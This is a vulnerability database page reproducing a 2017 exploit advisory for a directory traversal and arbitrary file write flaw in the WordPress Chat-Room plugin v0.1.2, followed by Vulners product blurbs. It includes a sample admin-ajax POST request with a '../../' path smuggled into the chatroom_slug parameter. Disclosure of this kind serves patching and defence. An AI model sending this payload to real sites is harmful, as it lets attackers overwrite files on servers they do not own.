Vulners
Lucene search
WordPress Chat-Room plugin v0.1.2 directory traversal/arbitrary file write Vulnerabilities
# Exploit Title: WordPress Chat-Room plugin v0.1.2 directory traversal/arbitrary file write
# Date: 2017-03-08
# Exploit Author: malwrforensics
# Vendor Homepage: https://webdevstudios.com/
# Software Link: https://wordpress.org/plugins/chat-room/
# Version: 0.1.2
# Tested on: WordPress 4.7.3, Ubuntu 16.04.2 LTS
#Folder used by the Chat-room plugin:
http://<server>/wp-content/uploads/chatter/
#POST http://<server>/wp-admin/admin-ajax.php HTTP/1.1
#...
#Referer: http://<server>/chat-room/<chat_name/
#...
#
#action=send_message&chatroom_slug=../../<new_path_and_file>&message=test
#Vulnerable file: chat-room.php
#function save_message():
# - the $chatroom_slug parameter is not sanitized
# - the log_filename parameters receives the value of $chatroom_slug
# - the write_log_file function is called which will do an
fopen($log_filename, 'w')
Thanks.
# 0day.today [2018-04-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Mar 2017 00:00Current
0.2Low risk
Vulners AI Score0.2